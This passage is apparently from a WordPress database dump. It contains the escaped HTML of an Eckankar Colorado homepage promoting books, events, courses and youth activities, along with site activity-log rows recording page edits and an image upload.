class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236858,40265,'post_type','page'),(236857,40265,'post_id','7160'),(236856,40264,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(236853,40264,'_user_login','S8zhaBda'),(236854,40264,'_user_email','nada@zipnadanot.org'),(236855,40264,'_server_remote_addr','76.130.120.x'),(236852,40264,'_user_id','2'),(236850,40264,'attachment_filesize','14421'),(236851,40264,'_message_key','attachment_created'),(236849,40264,'attachment_mime','image/png'),(236847,40264,'attachment_title','wave-white-2-h-250'),(236848,40264,'attachment_filename','wave-white-2-h-250.png'),(236846,40264,'attachment_id','269281'),(236845,40264,'post_type','attachment'),(236844,40263,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236841,40263,'_user_login','S8zhaBda'),(236842,40263,'_user_email','nada@zipnadanot.org'),(236843,40263,'_server_remote_addr','76.130.120.x'),(236840,40263,'_user_id','2'),(236839,40263,'_message_key','post_updated'),(243136,41210,'_user_email','nadazipought@zilch.org'),(243135,41210,'_user_login','john-admin-96'),(243134,41210,'_user_id','15'),(243133,41210,'_message_key','post_updated'),(243055,41201,'_user_email','nada@zipnadanot.org'),(243054,41201,'_user_login','S8zhaBda'),(243053,41201,'_user_id','2'),(243052,41201,'_message_key','appearance_customized'),(243051,41201,'control_type','nav_menu_item'),(243050,41201,'control_label','YouTube'),(243049,41201,'control_id','nav_menu_item[7248]'),(243048,41201,'setting_new_value','false'),(243009,41197,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 